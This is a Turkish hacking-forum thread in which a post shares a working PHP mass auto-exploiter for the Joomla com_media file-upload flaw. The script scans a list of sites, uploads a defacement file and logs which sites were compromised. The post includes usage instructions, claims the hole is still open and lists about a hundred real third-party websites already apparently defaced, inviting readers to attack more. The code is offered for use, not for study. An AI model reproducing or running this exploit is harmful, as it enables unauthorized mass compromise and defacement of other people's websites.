PHP com_media Exploit

kapatmışlar olabilirmi açıklarını

 

Olabilrlermi .d neyse bro eyv zahmet oldu

 

estf. ama çözdün

 

estf. ama çözdün

ama bi tane bile düşmedi aslşdiaşsld

 

eline sağlık

 

still working?

 

Merhaba Gençler

Exploit soranlar var

paylaşacağım exploit joomla com_media exploitidir.Açık Hala Mevcuttur.

<?php
// Tu5b0l3d -IndoXploit-
// http://blog.indoxploit.or.id/2016/05/auto-exploiter-commedia.html

error_reporting(0);

function save($aso){
        $fp = @fopen("aq.htm", "a") or die("cant open file");
        fwrite($fp, $aso);
        fclose($fp);
}
if($argv[1] != ""){
$nama = $argv[1];
$buka=fopen("$nama","r");
$size=filesize("$nama");
$baca=fread($buka,$size);
$sites = explode("<br>", $baca);
$file = "sht.txt";
foreach($sites as $sitesn){
$site = parse_url($sitesn, PHP_URL_HOST);
$urlq = "http://$site";
echo "$urlq\n";
$ch4 = curl_init ("$urlq/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=");
                    curl_setopt ($ch4, CURLOPT_RETURNTRANSFER, 1);
                    curl_setopt ($ch4, CURLOPT_FOLLOWLOCATION, 1);
                    curl_setopt ($ch4, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
                    curl_setopt ($ch4, CURLOPT_SSL_VERIFYPEER, 0);
                    curl_setopt ($ch4, CURLOPT_SSL_VERIFYHOST, 0);
                    curl_setopt($ch4, CURLOPT_COOKIEJAR,'coker_log');
                curl_setopt($ch4, CURLOPT_COOKIEFILE,'coker_log');
             
                    $data = curl_exec ($ch4);
                    curl_close($ch4);

                    preg_match("/<form action=\"(.*?)\" id=\"uploadForm\"/", $data, $action);
                    preg_match("/name=\"return-url\" value=\"(.*?)\"/", $data, $return);
                    $action = $action[1];
                    echo "$action\n";
                    echo "$return[1]\n";


$post = array("Filedata[]" => "@$file",
        "return-url" => "$return[1]",
         
            );

                 
                    $ch2 = curl_init ("$action");
                    curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
                    curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
                    curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
                    curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
                    curl_setopt ($ch2, CURLOPT_POST, 1);
                    curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post);
                    curl_setopt($ch2, CURLOPT_COOKIEJAR,'coker_log');
                curl_setopt($ch2, CURLOPT_COOKIEFILE,'coker_log');
                    $data2 = curl_exec ($ch2);
                                 
curl_close($ch2);

$a = file_get_contents("$urlq/images/$file");
if(preg_match("/Hacked/i", $a)){
    echo "Ok\n$urlq/images/$file\n\n";
    save("<a href='$urlq/images/$file'>$urlq/images/$file</a><br>");
 
}
else{
    echo "NO\n\n";
}
}
}
else{
    echo "usage php $argv[0] target.txt\n\n";
}
?>

Kullanımı php com.php sitelist.txt Şeklindedir.

Masa üstüne bir dosya açın içine exploit koyun ondan sonra içine txt nizi koyun taratın.Sonuçları bulunduğu klasöre aq.htm olarak kaydedecektir.

Aşağıda Örnek Siteler Mevcuttur.Deneme yapabilirsiniz.Zoneleri alınık başka bir mirror sitesinden zone alabilirsiniz.Sorun yaşarsanız bu konu altına yazın pm atmayın

http://www.lazerled.net/images/sht.txt
http://www.duvardekorasyon.net/images/sht.txt
http://chulkovo.info/images/sht.txt
http://parkety.info/images/sht.txt
http://drtech.info/images/sht.txt
http://aniahaba.info/images/sht.txt
http://fiatech.org/images/sht.txt
http://truthnet.org/images/sht.txt
http://www.healthuganda.org/images/sht.txt
http://www.riverdaletemple.org/images/sht.txt
http://www.iveamerica.org/images/sht.txt
http://kisyuzmemaratonu.org/images/sht.txt
http://restorator.name/images/sht.txt
http://my2cents.asia/images/sht.txt
http://artindex.pro/images/sht.txt
http://www.caepe.org.ar/images/sht.txt
http://www.radiopuntasanluis.com.ar/images/sht.txt
http://lidera.com.ar/images/sht.txt
http://www.malonmalon.com.ar/images/sht.txt
http://www.jureclomas.com.ar/images/sht.txt
http://sportleo.at/images/sht.txt
http://www.selitsch.at/images/sht.txt
http://www.skischule-reith.at/images/sht.txt
http://www.bieradies.co.at/images/sht.txt
http://erichdonabaum.at/images/sht.txt
http://www.hak-braunau.at/images/sht.txt
http://www.janits.at/images/sht.txt
http://www.speeding.at/images/sht.txt
http://www.veranstaltungsschloss.at/images/sht.txt
http://healyourmind.com.au/images/sht.txt
http://www.ascenter.com.au/images/sht.txt
http://geelongbowls.com.au/images/sht.txt
http://www.a4de.com.au/images/sht.txt
http://www.amps.vic.edu.au/images/sht.txt
http://warbys.net.au/images/sht.txt
http://cuac.org.au/images/sht.txt
http://seniorsholidaytravel.com.au/images/sht.txt
http://www.professionalpilottraining.com.au/images/sht.txt
http://www.sjofartsmuseum.ax/images/sht.txt
http://www.pznoord.be/images/sht.txt
http://www.devenyn.be/images/sht.txt
http://www.kuwaitembassy.be/images/sht.txt
http://partyvent.be/images/sht.txt
http://www.dagcentrumeindelijk.be/images/sht.txt
http://www.tennisas.be/images/sht.txt
http://tennisas.be/images/sht.txt
http://www.radiosouvenirs.be/images/sht.txt
http://www.roscoprojects.be/images/sht.txt
http://www.chairs.bg/images/sht.txt
http://www.1001.bg/images/sht.txt
http://www.posedu.ufop.br/images/sht.txt
http://www.ipcp.com.br/images/sht.txt
http://www.indprogresso.com.br/images/sht.txt
http://www.ppgds.unimontes.br/images/sht.txt
http://altaflorestadoeste.ro.gov.br/images/sht.txt
http://www.neltek.com.br/images/sht.txt
http://www.redecomuna.com.br/images/sht.txt
http://maqua.by/images/sht.txt
http://www.pgo.by/images/sht.txt
http://artvideo.by/images/sht.txt
http://ks-tour.by/images/sht.txt
http://chaikoffskiy.by/images/sht.txt
http://liguedudomaine.ca/images/sht.txt
http://www.elitecreative.ca/images/sht.txt
http://www.mun-maskinonge.ca/images/sht.txt
http://smcaa.ca/images/sht.txt
http://www.k9knk.ca/images/sht.txt
http://www.positivelynourishing-nc.ca/images/sht.txt
http://positivelynourishing-nc.ca/images/sht.txt
http://jdlrealty.ca/images/sht.txt
http://www.happyvalley.cc/images/sht.txt
http://www.fasteddy.cc/images/sht.txt
http://albisser.ch/images/sht.txt
http://www.cinqcops.ch/images/sht.txt
http://prinzesschen.ch/images/sht.txt
http://www.tennisrico.ch/images/sht.txt
http://ftp.baer-schreinerei.ch/images/sht.txt
http://www.sanabel.ch/images/sht.txt
http://www.kuenzle-farma.ch/images/sht.txt
http://www.hebammenpraxis-gossau.ch/images/sht.txt
http://www.mittlenberg.ch/images/sht.txt
http://www.scaleknights.ch/images/sht.txt
http://www.ecomadrigal.cl/images/sht.txt
http://www.forceprotection.cl/images/sht.txt
http://belenox.cl/images/sht.txt
http://www.reddigital.cl/images/sht.txt
http://cndhl.cm/images/sht.txt
http://www.cndhl.cm/images/sht.txt
http://www.vital-office.cn/images/sht.txt
http://friendsbook.cn/images/sht.txt
http://takfaraz.co/images/sht.txt
http://www.hotelzemskabrana.cz/images/sht.txt
http://www.sokolroudnicenl.cz/images/sht.txt
http://www.webclick.cz/images/sht.txt
http://zdravi4u.cz/images/sht.txt
http://www.uvax.cz/images/sht.txt
http://www.jawa.cz/images/sht.txt
http://xsky.cz/images/sht.txt

eyvallah